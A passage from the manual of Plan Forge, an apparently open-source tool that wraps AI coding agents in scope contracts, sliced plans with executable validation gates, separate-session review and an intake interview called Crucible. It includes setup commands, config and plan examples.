| IC engineers (architecture, security, performance, DB, deploy, API, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance) | 20 specialized agents + 17 auto-loading guardrail files |
| Tech lead / staff engineer | Quorum mode (multi-model consensus) + auto-escalation on slice failure |
| Engineering manager | Forge-Master Observer + Auditor — agents supervising agents, not metaphorically, literally |
| QA team | Tempering harness + testbed + regression guard + slice gates |
| SRE / on-call | LiveGuard — secret scan, drift report, dep watch, env diff, incident capture, runbooks |
| Continuous improvement / retros | Audit loop + bug registry auto-smelt + Reflexion lessons + auto-skill promotion (loops that run unattended for weeks and learn from every pass) |
| Architecture review board | Independent Session-3 review gate (fresh AI session, full guardrail load) |
| Institutional knowledge / wiki | OpenBrain L3 memory with Hallmark provenance |
| Release manager | Shipper agent + release-checklist + version.instructions.md |
dotnet, typescript, python, etc.), declare Project Principles, set forbidden patterns. One-time, then locked.AI coding agents are powerful but directionless.
They generate code fast. But fast isn't the same as good. Without a full shop around them, without scope contracts, slice gates, post-deploy guards, and institutional memory, AI-generated code tends to be untestable, insecure, architecturally inconsistent, and impossible to maintain at scale. That's fine for prototypes; it's not fine for production systems.
You've probably lived this pattern:
You fire up an AI agent, Copilot, Cursor, Claude, whatever, and describe the app you want. The first 80% is magic. Files appear, components wire up, the database schema materializes. You're shipping faster than you ever thought possible.
Then complexity creeps in. Auth flows interact with database queries. Middleware chains get long. The agent still works, but you notice it's making assumptions without asking, it picked a caching strategy you wouldn't have chosen, refactored code from three sessions ago that was working fine.
Then the wall. Every change breaks something else. Fix the auth bug, break the dashboard. Fix the dashboard, break the API response format. The agent is confidently producing code that compiles but doesn't work. You're debugging AI-generated code you don't fully understand, in an architecture you didn't fully choose.
The pattern everyone hits: prompt → hope → fix → re-prompt → hope harder.
Plotted as completion vs. confidence, the failure mode is consistent across teams and tools:
The fix is the full shop: Smelt before the agent writes a line of code, Forge the scope so it can't drift, Guard what ships, and Learn with a memory that carries decisions forward.
Vibe coding gets you a prototype. Plan Forge gets you a product.
Longer narrative version with the failure stories: The 80/20 Wall: Why AI Agents Break What They Build.
pforge run-plan) and quorum mode use your IDE's AI model, consuming premium requests.
Direct API providers (xAI Grok, OpenAI) require API keys and are billed per-token.
The Dashboard's Cost tab tracks every dollar.
Without the shop, AI coding agents:
If you've managed human dev teams, you know guardrails aren't about distrust, they're about consistency. The same principle applies when your team members are AI models.
These problems get worse the less technical your team is, you may not even notice the drift until it's too late.
| Without the shop | With Plan Forge |
|---|---|
| Agent writes code that passes once, breaks in production | Code follows your architecture from the first line (Smelt) |
| 30–50% of AI-generated code needs rework after review | Independent review catches drift before merge (Forge) |
| Agent re-discovers solved problems every session | Persistent memory loads prior decisions in seconds (Learn) |
| Secrets and CVEs slip into deploys | LiveGuard blocks pre-deploy on severity ≥ high (Guard) |
| Context window wasted on exploration and backtracking | Hardened plan tells the agent exactly what to build |
| "It works on my machine" shipped to staging | Validation gates pass at every slice boundary |
Plan Forge is an AI-native SDLC workshop, four stations connected by gates, telemetry, and memory, that converts your rough ideas into shipped, defended, remembered software. It installs guardrail files, MCP tools, reviewer agents, and a live dashboard into your project so every AI edit happens inside the shop, not next to it.
A blacksmith doesn't hand raw iron to a customer. They heat it, hammer it, temper it, and, in a real shop, the master smith watches it ship, remembers which blades broke, and sharpens the process for next time.
Plan Forge does the same for your development plans:
| Shop Stage | Station | What Happens |
|---|---|---|
| 🔥 Heat, raw ore | Smelt | You describe what you want; the Specifier agent extracts a Scope Contract |
| 🔨 Hammer, shape it | Forge | Plan broken into slices with validation gates; AI builds slice-by-slice |
| 💧 Quench, check the edge | Forge | Fresh-session review audits for drift, completeness, quality |
| 🛡️ Guard, patrol the floor | Guard | LiveGuard scans secrets, drift, regressions, CVEs pre- and post-deploy |
| 🧠 Remember, sharpen the process | Learn | Every incident, fix, and review feeds OpenBrain memory + bug registry + Health DNA |
You're using Copilot or Claude to build features, but you've noticed the AI drifts when sessions get long. You spend time re-explaining your patterns. Plan Forge gives you a repeatable pipeline that remembers your standards, validates at every step, and catches the mistakes you'd normally catch in code review, except there's no reviewer. You are the team.
Your team uses AI tools but everyone gets different quality results. Junior devs get code that works but violates your architecture. Senior devs spend review cycles catching AI-generated antipatterns. Plan Forge makes the architecture the default, instruction files load automatically, validation gates enforce build+test, and the reviewer-gate agent catches drift before anyone opens a PR.
You need audit trails, consistent architecture, and code that meets compliance standards. Plan Forge gives you phase-level tracking (DEPLOYMENT-ROADMAP.md), per-slice cost accounting, OTLP telemetry, and 19 independent reviewer agents, including compliance, security, and multi-tenancy auditors that run automatically. Every execution has a trace.
Positioning matters more than features when an entire category is in motion. The shortest answer is paired: what Plan Forge claims to be, and the closest things it deliberately is not.
| Plan Forge is | Plan Forge is not |
|---|---|
| The orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). | An AI model. Plan Forge works with whatever AI you already use, Copilot, Claude, Cursor, Codex, Gemini, Windsurf, or any tool that accepts text prompts. |
| The SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation. | A code generator. Plan Forge doesn't write your code, it tells the AI how to write it, then verifies the result. |
| Opinionated about software shape (interfaces, DTOs, typed exceptions, tests), see the 99-vs-44 evidence below. | Opinionated about your stack. Nine presets cover .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC. Each installs stack-appropriate guardrails. |
| MIT-licensed because your SDLC is yours. | A managed cloud service or a process you rent. Plan Forge runs entirely inside your existing IDE, CLI, and repo. |
| Tied to your repo's source of truth via GitHub Issues, PRs, and Actions, Plan Forge writes to the artifacts you already audit. | A CI/CD system. It doesn't deploy your app. It validates that what's built matches what was planned. Your CI pipeline is a separate concern. |
| Designed so your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor. | A project manager. It doesn't assign tasks to humans or track sprints. It structures work for AI agents, slices, gates, scope contracts. |
The shop story is testable. The April 2026 .NET A/B test built the same WebAPI twice from an identical .NET 10 skeleton (same git commit baseline) using the same model (Claude Opus 4.6) on the same machine. One run used Plan Forge guardrails; the other used pure vibe coding. Comparable wall-clock time, 7 minutes for Plan Forge, 8 minutes for vibe coding (the extra minute went to fighting build errors).
| Metric | Vibe coding | Plan Forge | Delta |
|---|---|---|---|
| Tests | 13 | 60 | 4.6× more |
| Interfaces | 0 | 6 | vibe = 0 |
| DTOs | 0 | 9 | vibe = 0 |
| Typed exceptions | 0 | 4 | vibe = 0 |
| CancellationToken references | 0 | 79 | vibe = 0 |
| Quality score (/100) | 44 | 99 | 2.25× higher |
| Build time | 8 min | 7 min | guardrails didn't add overhead |
The vibe run spent its extra minute fighting build errors caused by an EF Core InMemory misconfiguration that the model had to diagnose, backtrack, and fix at the cost of sacrificing a requirement (banker's rounding). That rework cycle is invisible in a demo; at scale it is the dominant cost.
Full A/B test write-up with code samples, methodology, and links to both repositories: The A/B Test: 99 vs 44 — Same App, Same Model, Same Time.
This manual follows the four stations of the shop:
📄 Full reference: README on GitHub
Tour of the Forge Shop: four stations, the gates between them, and the sessions that keep them honest.
Plan Forge is not one step, it's a workshop. Every change to your code flows through four stations, each with its own tools, its own artifacts, and its own gate to the next station.
The stations are connected by gates, Smelt won't hand the plan to Forge until the Scope Contract is crisp; Forge won't ship code until slice gates are green; Guard won't approve a deploy until secret-scan + env-drift are clean; Learn absorbs everything and feeds it back into Smelt for the next plan.
Drawn linearly, Plan Forge looks like a 7-step pipeline. Drawn honestly, it's a closed loop. Every failed test, every regression caught by tempering, every placeholder spotted by a discovery scan re-enters the Smelt station as a new ore, auto-smelted into a Crucible idea, hardened into a slice, executed, and re-tested. The loop only pauses when there's nothing left to find.
The Forge station, where raw scope becomes shipped code, runs a 7-step pipeline. Steps 0–2 happen in Smelt, steps 3–6 happen in Forge, step 6 hands off to Guard and Learn.
You describe what you want (Step 0, Smelt). The AI creates a spec. A pre-flight check verifies your setup (Step 1, Smelt). The plan gets hardened into a binding scope contract with slices, gates, and forbidden actions (Step 2, Smelt), this is when Smelt hands off to Forge. The AI builds it slice by slice, validated at every boundary (Step 3, Forge). A completeness sweep eliminates stubs and TODOs (Step 4, Forge). A fresh session audits everything (Step 5, Forge). The shipper commits, LiveGuard runs its pre-deploy scan (Step 6, Guard), and OpenBrain captures lessons (Step 6, Learn).
Specify, verify, harden. Produces the scope contract.
Execute slices, sweep for completeness.
Fresh context. Independent review.
Commit, LiveGuard scan, capture lessons.
The executor shouldn't self-audit, that's like grading your own exam. Each session starts fresh, loads the same guardrails, but brings independent judgment. Session 3 (Review) has never seen the code being written, it reads the plan, reads the code, and checks for drift. Session 4 is when Guard and Learn take over: LiveGuard does its pre-deploy scan, OpenBrain writes the lessons.
The grading-your-own-exam analogy above is the short version. Three concrete mechanisms make session isolation a structural requirement rather than a stylistic preference:
The session that wrote the code will defend it. Not because the model is stubborn, because the bad code and the proposed fix live in the same token sequence. The model's belief that the code is correct is encoded in the same context that produced it; the model literally cannot evaluate the code from a position of "I have not seen this before." A fresh session reads the same code without any prior commitment to it.
Build sessions accumulate context as they work, rejected approaches, half-considered alternatives, partial refactors. By the time the session finishes, its reasoning is shaped by paths it considered but didn't take. A reviewer in the same session inherits all of that as background noise. A reviewer in a fresh session sees only the final code, against the original plan, with no memory of the rabbit holes.
Some bugs are only visible from outside the build session's mental model. A naming inconsistency, a forgotten edge case, an architectural violation that the build session rationalized in the moment, these surface immediately to a reviewer that didn't participate in the rationalization. The build session is not lying; it cannot see what is invisible from inside its own context.
The v2.18 Temper Guards and Warning Signs system codified the failure modes that emerged from this pattern, the specific shortcuts agents take that produce compiling but architecturally broken code. Each instruction file now teaches agents not just what to do but why not to skip it. Session isolation is the structural defense; Temper Guards are the named anti-patterns it catches.
Source material: The 80/20 Wall and Guardrails Lessons Learned. The grading-your-own-exam analogy is adapted from Lesson 3.
After setup, Plan Forge installs four types of files into your .github/ directory:
.github/
├── instructions/ ← Rules (auto-load by file type)
│ ├── architecture-principles.instructions.md
│ ├── security.instructions.md
│ ├── testing.instructions.md
│ ├── database.instructions.md
│ └── ... (14–18 files per preset)
├── agents/ ← Reviewer personas (read-only audit)
│ ├── architecture-reviewer.agent.md
│ ├── security-reviewer.agent.md
│ └── ... (12 agents)
├── prompts/ ← Pipeline templates (attach in chat)
│ ├── step0-specify-feature.prompt.md
│ ├── step2-harden-plan.prompt.md
│ └── ... (7 pipeline + scaffolding)
├── skills/ ← Multi-step procedures (slash commands)
│ ├── security-audit/SKILL.md
│ ├── forge-execute/SKILL.md
│ └── ... (11 skills)
├── hooks/ ← Lifecycle automation
│ ├── sessionStart.sh
│ └── postToolUse.sh
└── copilot-instructions.md ← Master config file
| File Type | What It Does | Analogy |
|---|---|---|
| Instruction files | Auto-load based on what file you're editing | The rulebook |
| Agent definitions | Specialized reviewers that audit your code | Expert consultants |
| Pipeline prompts | Step-by-step workflow templates | The recipe |
| Skills | Multi-step executable procedures | Power tools |
| Lifecycle hooks | Run automatically at agent lifecycle points | Safety rails |
Each instruction file has an applyTo pattern in its YAML frontmatter. When you edit a file that matches the pattern, the instruction file loads automatically into the AI's context:
---
description: Security best practices
applyTo: "**/auth/**,**/security/**,**/middleware/**"
---
When you open src/auth/token-validator.ts, the security instruction file loads. When you open src/models/User.ts, the database instruction file loads. No manual action needed, the AI reads the right rules for the right code.
.forge.json ConfigThis file stores your project's Plan Forge configuration:
{
"preset": "dotnet",
"modelRouting": {
"default": "claude-sonnet-4.6",
"execute": "grok-4",
"review": "claude-opus-4.7"
},
"escalationChain": ["grok-4", "claude-opus-4.7", "gpt-5.2-codex"],
"quorumThreshold": 6
}
Key settings: which preset was used, which models to use for each role (execution vs review), the escalation chain when a model fails, and the complexity threshold for quorum mode.
A plan is just a .md file with structure. It lives in docs/plans/ and follows a template. Here's the minimal skeleton:
# Phase 1, User Authentication
## Scope Contract
**In Scope**: src/auth/**, src/middleware/auth*, tests/auth/**
**Out of Scope**: frontend, deployment, CI
**Forbidden Actions**: Do NOT modify src/database/migrations/
## MUST Criteria
- [ ] JWT token generation and validation
- [ ] Role-based access control (admin, user)
- [ ] Password hashing with bcrypt
## Execution Slices
### Slice 1, Auth Models + Migration [30 min]
**Tasks**: Create User model, JWT service
**Gate**: `dotnet build` passes, `dotnet test` passes
**Stop if**: Build fails or migration errors
### Slice 2, Auth Middleware [30 min]
**Tasks**: JWT validation middleware, role decorator
**Gate**: `dotnet test`, 6+ tests pass
**Stop if**: Any existing test regresses
The AI reads this contract and follows it literally. Slices are checkpointed, the gate at the end of each slice must pass before proceeding to the next.
These are the three building blocks of every plan:
| Concept | What It Is | Why It Matters |
|---|---|---|
| Slice | A 30–120 minute chunk of work with a clear goal | Small enough to validate, large enough to be useful. One PR's worth. |
| Gate | A validation check at the end of each slice (build, test, specific assertions) |
Catches failures immediately. No silent drift. |
| Scope Contract | What files the AI can touch, what's forbidden, what's out of scope | Prevents "I'll also refactor this unrelated file" creep. |
The same pipeline can run three different ways. Pick the one that matches your tools:
| Approach | How It Works | Best For |
|---|---|---|
| Pipeline Agents | Select the Specifier agent → click handoff buttons through the chain | VS Code + Copilot. Smoothest flow. |
| Prompt Templates | Attach step0-*.prompt.md files in Copilot Chat |
Learning the pipeline. You see every prompt. |
| Copy-Paste Prompts | Copy prompts from the runbook into any AI tool | Claude, Cursor, ChatGPT, terminal agents. |
All three produce identical results. The guardrails, validation gates, and pipeline steps are the same, only the delivery mechanism differs.
📄 Full reference: Multi-Agent Setup — GitHub Copilot, capabilities
Zero to pforge smith green in 10 minutes.
| Requirement | Minimum Version | Check Command | Required for |
|---|---|---|---|
| Git | 2.30+ | git --version | Everyone |
| VS Code (or Insiders) | 1.99+ | code --version | UI path |
| GitHub Copilot extension | Copilot subscription active | Copilot icon visible in status bar | UI path |
| Node.js | 18+ | node --version | CLI / server path |
pforge.ps1 / pforge.sh, and the 102 tools (REST API + WebSocket hub). Skip Node.js if you'll only use the core pipeline, prompts, instruction files, agents, and skills all live inside .github/ and run entirely inside Copilot Chat.
The fastest path, clone the repo and run the setup wizard:
git clone https://github.com/srnichols/plan-forge.git my-project-plans
cd my-project-plans
.\setup.ps1 -Preset <your-stack>
This installs all guardrails, agents, prompts, skills, and MCP tools into your project. See the preset list below.
Clone the template and run the setup wizard:
git clone https://github.com/srnichols/plan-forge.git my-project-plans
cd my-project-plans
# Interactive, the wizard asks which preset
.\setup.ps1
# Or specify directly
.\setup.ps1 -Preset dotnet
chmod +x setup.sh
./setup.sh --preset typescript
The wizard detects your tech stack (or uses the preset you specify), creates .github/ with instruction files, agents, prompts, skills, and hooks, generates .forge.json, and sets up .vscode/settings.json.
git clone https://github.com/srnichols/plan-forge.git ../plan-forgecd ../plan-forge && ./setup.ps1 -ProjectPath ../my-existing-app -Preset typescriptNine presets, each tailored to a tech stack. Each installs ~18 instruction files, 12 agents, 11 skills, and 8 pipeline prompts.
.\setup.ps1 -Preset dotnet,typescript
After setup completes, your project has:
.github/
├── instructions/ ~26 files (architecture, security, testing, database, ..., 18 preset + 8 shared)
├── agents/ 19 files (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier)
├── prompts/ ~23 files (15 preset + 8 shared pipeline: project-profile + step0–step6)
├── skills/ 11 dirs (varies by preset: dotnet 11, typescript 10)
├── hooks/ 5 items (PreDeploy.md, PreCommit.mjs, PreAgentHandoff.md, PostSlice.md, plan-forge.json)
└── copilot-instructions.md (master config)
.forge.json (project configuration)
.vscode/settings.json (Copilot settings)
docs/plans/
├── DEPLOYMENT-ROADMAP.md (phase tracker)
└── AI-Plan-Hardening-Runbook.md (methodology reference)
pforge.ps1 / pforge.sh (CLI scripts)
PreDeploy, PreCommit, PreAgentHandoff, and PostSlice (plus the plan-forge.json hook config). These are not the same as Claude Code's hook names (SessionStart, PreToolUse, etc.), if you're coming from Claude Code, the trigger semantics differ. See .github/hooks/plan-forge.json for the live configuration.
pforge smithThe Smith inspects your forge, environment, VS Code config, setup health, version currency. Run it to confirm everything is green:
.\pforge.ps1 smith
╔══════════════════════════════════════════════════════════════╗
║ Plan Forge, The Smith ║
╚══════════════════════════════════════════════════════════════╝
Environment:
✓ git 2.44.0
✓ code (VS Code CLI) 1.99.0
✓ PowerShell 7.5.0
✓ node 22.3.0
VS Code Configuration:
✓ chat.agent.enabled = true
✓ chat.promptFiles = true
Setup Health:
✓ .forge.json valid (preset: dotnet, v2.17.0)
✓ 21 instruction files (expected: ≥17 for dotnet)
✓ 19 agent definitions
✓ copilot-instructions.md exists
────────────────────────────────────────────────────
Results: 10 passed | 0 failed | 0 warnings
FIX: suggestion. Common fix: add "chat.agent.enabled": true to .vscode/settings.json. See Chapter 15: Troubleshooting for more.
Plan Forge works primarily with VS Code + GitHub Copilot. But if you also use Claude Code, Cursor, Codex, Gemini, or Windsurf, add their adapters during setup:
# Add Claude Code support
.\setup.ps1 -Preset dotnet -Agent claude
# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all
| Agent Flag | Tool | Files Created |
|---|---|---|
copilot (default) | GitHub Copilot | .github/ instructions, agents, skills, prompts, hooks |
claude | Claude Code | CLAUDE.md with embedded guardrails + slash commands |
cursor | Cursor | .cursorrules + .cursor/rules/*.mdc |
codex | Codex CLI | AGENTS.md + skill scripts |
gemini | Gemini CLI | GEMINI.md + .gemini/commands/*.toml |
windsurf | Windsurf | .windsurfrules + .windsurf/rules/*.md |
generic | Any AI tool | AI-ASSISTANT.md, copy-paste guardrails |
See Chapter 13: Multi-Agent Setup for detailed configuration per agent, feature parity matrix, and quorum mode.
When a new Plan Forge version is available, pforge smith will tell you. Update without re-running the full setup:
# Preview what would change
.\pforge.ps1 update --dry-run
# Apply updates
.\pforge.ps1 update
Updates replace framework files (pipeline prompts, shared instructions, hooks) but never touch your customized files (copilot-instructions.md, project principles, plan files, .forge.json).
pforge update pull from?
By default (auto), it picks the newer of a local sibling clone at ../plan-forge and the latest GitHub tag, so a stale master checkout won't drag you onto unreleased -dev bytes. See Appendix G: Update Source Modes for the github-tags and local-sibling options and when to use them.
📄 Full reference: Multi-Agent Setup, Quick Start on GitHub
Here's what works and here's what breaks.
Every hardened plan has these mandatory sections. The plan-hardener agent adds them automatically during Step 2 (or the Crucible interview adds them upstream during Smelt), but you should understand what each does and how to edit them:
| Section | Required? | Purpose |
|---|---|---|
| Scope Contract | Yes | In-scope paths, out-of-scope, forbidden actions |
| MUST Criteria | Yes | Non-negotiable outcomes (checkboxes) |
| SHOULD Criteria | Optional | Best-effort goals |
| Build / Test Commands | Yes v2.82.1+ | build-command + test-command, required by the Crucible critical-fields gate |
| Execution Slices | Yes | Checkpointed work chunks with gates and per-slice **Files in scope** |
| Branch Strategy | Recommended | Git branch name and merge approach |
| Rollback Plan | Recommended | How to undo if things go wrong |
**Files:** or **Files in scope** (the latter is what the Crucible/hardener now emit). Validation gates can be authored as either **Validation Gate** or **Exit gate**. The orchestrator parses both. Hand-authored plans following the convention should prefer the Files in scope + Exit gate pair to match generated output.
Plans created via the Crucible smelter are now blocked from finalizing until every CRITICAL_FIELD is filled in. This eliminates the entire class of "TBD-laden plans that compile but can't run."
| Field | What it locks down | Example |
|---|---|---|
build-command | The exact command the orchestrator will run as the build gate per slice | dotnet build |
test-command | The exact command the orchestrator will run as the test gate | dotnet test |
scope | In-scope paths (per-slice Files in scope + plan-level scope) | src/services/**, tests/services/** |
validation-gates | At least one executable gate per slice | dotnet test --filter UserService |
forbidden-actions | Concrete file patterns or actions that are out-of-bounds | Do NOT modify src/database/migrations/ |
rollback | How to undo the change cleanly | git revert <commit> or named feature flag |
If any CRITICAL_FIELD is missing, forge_crucible_finalize returns 409 with CRITICAL_FIELDS_MISSING and a criticalGaps[] array pointing at the unresolved fields. The Crucible interview adds a question for each missing field automatically, the feature lane now asks 7 questions (was 6); the tweak lane asks 4 (was 3).
The build/test commands are inferred from your repo when possible (via inferRepoCommands, checks package.json, *.csproj, pyproject.toml, Cargo.toml, etc.) so most projects don't have to type them by hand.
docs/plans/Phase-NN.md instead of using the Crucible, the gate doesn't apply. But you still want to fill these fields in, the orchestrator reads build-command and test-command from the plan frontmatter when running gates that don't specify a full command inline.
The scope contract is the most important section. It tells the AI exactly what files it can touch, and what's off-limits.
## Scope Contract
**In Scope**: src/services/UserService.cs, src/repositories/UserRepository.cs,
tests/services/UserServiceTests.cs, tests/repositories/UserRepositoryTests.cs
**Out of Scope**: frontend/**, deployment/**, docs/** (except this plan)
**Forbidden Actions**:
- Do NOT modify src/database/migrations/ (migration is a separate phase)
- Do NOT change AppSettings.json connection strings
- Do NOT add NuGet packages without explicit approval
## Scope Contract
**In Scope**: anything related to users
**Out of Scope**: nothing specific
**Forbidden Actions**: don't break things
"Anything related to users" gives the AI free rein to refactor 20 files. "Don't break things" isn't enforceable. Be specific about paths, and list forbidden actions as concrete file patterns. That's how you get lasagna code, clean layers, each with a purpose, instead of spaghetti where everything touches everything.
Before the rules, the worked example. The same feature, add a User Profile endpoint, planned two ways:
Slice 1, Add User Profile feature [≥90 min, unbounded]
• Database migration
• Repository
• Service
• Controller
• Tests
When the gate fails you have no idea which layer broke, the migration can't roll back cleanly without nuking the service work, and the reviewer is reading a 12-file diff with no checkpoint to anchor against.
Slice 1, Migration + model [30 min]
Slice 2, Repository + unit tests [45 min]
Slice 3, Service + business-logic tests [60 min]
Slice 4, Controller + integration tests [45 min]
Each slice ends at a real checkpoint. A migration failure stops Slice 1 cleanly. A controller bug at Slice 4 doesn't touch the migration in Slice 1. The reviewer reads four small diffs, each scoped to one architectural layer.
Slices are 30–120 minute chunks of work. Each slice should produce a commit-worthy change, the "one PR" rule.
Slice 1, Database migration + model [30 min]
Slice 2, Repository + unit tests [45 min]
Slice 3, Service layer + business logic tests [60 min]
Slice 4, API controller + integration tests [45 min]
Slice 5, Error handling + edge case tests [30 min]
Slice 6, Documentation + cleanup [30 min]
Gates are the quality checkpoints between slices. A gate must be a concrete, executable command, not a human judgment call.
**Gate**:
dotnet build # zero errors
dotnet test --filter "UserProfile" # 6+ tests pass
grep -rn "string interpolation" src/ # zero hits (security)
**Gate**: "tests pass" ← Which tests? How many?
**Gate**: "code looks clean" ← Not executable
**Gate**: "review the changes" ← Human-dependent, blocks automation
Mark slices that can run concurrently with the [P] tag. Add dependency declarations when slices must run in order:
### Slice 1, Database Migration [30 min]
...
### Slice 2, Repository Layer [P] [depends: Slice 1] [scope: src/repos/**]
...
### Slice 3, Service Layer [P] [depends: Slice 1] [scope: src/services/**]
...
### Slice 4, API Controller [depends: Slice 2, Slice 3]
...
Slices 2 and 3 both depend on Slice 1 (the migration) but are independent of each other, they run in parallel. Slice 4 waits for both to finish. The orchestrator builds a DAG (directed acyclic graph) and schedules accordingly.
[P] when slices touch different [scope: ...] paths.
Stop conditions tell the AI when to halt instead of trying to work around a failure:
**Stop if**: Build fails with compilation error
**Stop if**: Any existing test regresses (not just new tests)
**Stop if**: Migration produces data loss warning
**Stop if**: Security scan finds HIGH or CRITICAL vulnerability
Without stop conditions, the AI may try to "fix" a build failure by removing code, or skip a failing test by commenting it out. Stop conditions force it to report the problem instead of hiding it.
Each slice can list which instruction files are relevant. Don't load all 18, load only what's needed:
### Slice 1, Database Migration
**Context**: database.instructions.md, security.instructions.md
### Slice 4, API Controller
**Context**: api-patterns.instructions.md, auth.instructions.md, errorhandling.instructions.md
This keeps the AI's context window focused. A database slice doesn't need caching instructions; a controller slice doesn't need migration patterns.
| Mistake | What Happens | Fix |
|---|---|---|
| Scope too loose | AI refactors 20 files instead of 3 | List specific file paths, not categories |
| Scope too tight | AI can't create necessary helper files | Include reasonable wildcards: src/services/** |
| No stop conditions | AI works around failures silently | Add "Stop if" to every slice |
| Vague gates | Gate "passes" without actually validating | Use executable commands with expected counts |
| Tests in last slice | 5 slices of code, then discover it's untestable | Include tests alongside each code slice |
| Giant slices | 120+ min of work before first checkpoint | Break into 30–60 min focused chunks |
| Missing rollback | Panic when something breaks in production | Add rollback plan with specific git revert commands |
Eight language-specific plan examples ship with Plan Forge. Use them as starting points:
| Stack | File | Features Demonstrated |
|---|---|---|
| .NET | Phase-DOTNET-EXAMPLE.md | RLS, Dapper, Blazor, GraphQL, 12 slices |
| TypeScript | Phase-TYPESCRIPT-EXAMPLE.md | Express, Prisma, Vitest |
| Python | Phase-PYTHON-EXAMPLE.md | FastAPI, SQLAlchemy, Pytest |
| Java | Phase-JAVA-EXAMPLE.md | Spring Boot, JPA, JUnit |
| Go | Phase-GO-EXAMPLE.md | Chi router, sqlx, testing |
| Swift | Phase-SWIFT-EXAMPLE.md | Vapor, Fluent, XCTest |
| Rust | Phase-RUST-EXAMPLE.md | Axum, sqlx, Cargo test |
| PHP | Phase-PHP-EXAMPLE.md | Laravel, Eloquent, PHPUnit |
All examples live in docs/plans/examples/.
For a Design Patterns-style catalog of 25+ plan archetypes — database migrations, refactors, multi-service rollouts, bug sweeps, and more, each with a skeleton template — see Appendix Y — Plan Pattern Library.
📄 Full reference: AI-Plan-Hardening-Runbook.md on GitHub
The Crucible is the intake interview for Plan Forge. You bring a rough idea ("add user profile editing") and the smelter walks you through 4–12 questions, then writes out a complete Phase plan that's ready for the Forge to execute.
The Crucible has three sizes (called lanes) that scale the interview to the size of the change:
You can pick a lane explicitly, or let Crucible infer one from your raw idea (it looks for keywords like "bump" or "refactor subsystem"). When the interview ends, Crucible writes docs/plans/Phase-NN.md and hands it off to the Plan Hardener (Step 2 of the pipeline).
The Plan Hardener (Step 2) assumes you already know what you want to build. Crucible exists because most of the time, you don't, not precisely enough for a hardened plan. The smelter enforces three things:
crucibleId, lane, and source in its frontmatter so downstream gates can audit how it got here.docs/plans/Phase-*.md must carry a crucibleId. Plans get one of three ways: by finishing a smelt, by using --manual-import for hand-authored or Spec Kit imports, or by the grandfather migration that runs once when you first upgrade. Plans without a crucibleId are rejected at run time.
Crucible scales its interview to the size of the change. Pick (or let the server infer) one of:
Version bumps, config flag flips, doc edits, small bug fixes. Inferred when the raw idea mentions "bump", "fix typo", "update dep". Includes a forbidden-actions question so even tiny changes declare what they won't touch.
Default lane. New endpoint, new tool, new UI section, new service with a handful of slices.
Architectural shifts, subsystem introductions, anything that touches three or more top-level modules.
Crucible streams one question at a time. You answer, it writes the answer to the smelt's JSONL record, then it computes the next question. Six MCP tools drive the loop:
forge_crucible_submit { rawIdea, lane? source? } → { id, firstQuestion }
forge_crucible_ask { id, answer, questionId? } → { nextQuestion | done: true }
forge_crucible_preview { id } → { draft, criticalGaps[] }
forge_crucible_finalize{ id, overwrite? } → { phaseName, planPath, hardenerHandoff }
forge_crucible_list { status? } → [ smelts … ]
forge_crucible_abandon { id, reason? } → { ok }
Optional questionId on ask: pass the question id you're answering. If it doesn't match the server's pending question id, the call returns 409 with ASK_QUESTION_MISMATCH and an { expected, got } payload. Multi-turn LLM clients that fall out of sync get a loud failure instead of silent answer corruption.
Build/test command inference: when the build-command or test-command questions come up, the interview pre-fills suggestions via inferRepoCommands, it inspects package.json scripts, *.csproj, pyproject.toml, Cargo.toml, go.mod, etc. You usually just confirm.
Finalize writes docs/plans/<phaseName>.md with the answer-derived draft and emits crucible-handoff-to-hardener on the hub so the dashboard (and downstream agents) can pick up the plan for Step 2.
Crucible refuses to finalize a smelt with placeholder TBDs. The gate checks six fields; any unresolved field is a hard block:
| Field | Lane(s) | What it locks down |
|---|---|---|
build-command | all | Exact build command the orchestrator runs as a per-slice gate. Inferred from repo if possible. |
test-command | all | Exact test command. Inferred from repo if possible. |
scope | all | Plan-level + per-slice Files in scope |
validation-gates | feature, full | At least one executable gate per slice |
forbidden-actions | tweak (4), feature (7) | Concrete file patterns or named actions that are out-of-bounds |
rollback | feature, full | How to undo the change cleanly |
If any field is missing, forge_crucible_finalize returns:
{ ok: false, code: "CRITICAL_FIELDS_MISSING", criticalGaps: [{ field, reason, hint }, …] }409 Conflict with { criticalGaps[], unresolvedFields[], hint: "call /api/crucible/preview" }The preview tool returns the same criticalGaps[] structure without trying to write a plan, so LLM agents can self-correct.
If docs/plans/<phaseName>.md already exists and is non-empty, finalize refuses to overwrite a hand-authored plan:
<phaseName>.crucible-draft.md is written so the smelt's draft is preserved{ ok: false, code: "PLAN_ALREADY_EXISTS", phaseName, planPath, draftPath }409 Conflict with the same payloadoverwrite: true on either surface to bypass, the previous plan moves to <phaseName>.replaced-<timestamp>.mdA smelt can spawn a child smelt, useful when answering a question reveals a sub-feature that itself needs its own phase. The server enforces a maximum recursion depth (default 1, configurable up to 3) so a runaway agent cannot chain smelts indefinitely.
Child smelts inherit parentSmeltId and appear linked in the dashboard. The parent can reference the child's crucibleId in its frontmatter so the audit chain stays intact.
The crucible-enforce gate refuses to accept any plan under docs/plans/Phase-*.md without a crucibleId. There are exactly three legitimate ways to satisfy it:
crucibleId: grandfathered-<uuid> and a row in .forge/crucible/manual-imports.jsonl.pforge run-plan --manual-import path/to/plan.md stamps a synthetic imported-<source>-<uuid> id and logs the bypass. Reserved for Spec Kit imports, offline drafts, and genuine emergencies.Spec Kit users import external specs regularly. Crucible treats those imports as a first-class path:
pforge run-plan --manual-import docs/plans/imported/Phase-from-speckit.md \
--source speckit \
--reason "Imported from Spec Kit session 2026-04-15"
The gate writes frontmatter with source: speckit and appends an audit row. The Spec Kit importer does not require a full interview, it trusts that the external spec already carried equivalent structure.
Two tabs expose Crucible's state:
docs/plans/PROJECT-PRINCIPLES.md, .github/instructions/project-profile.instructions.md, and .github/instructions/project-principles.instructions.md, plus the full manual-import audit log. Edits happen in your editor; this tab is intentionally non-editable.The Config tab's Crucible section persists to .forge/crucible/config.json. All writes go through a sanitizer that drops unknown fields and snaps numbers to safe bounds, so no UI bug can corrupt the file.
| Field | Range | Default | What it does |
|---|---|---|---|
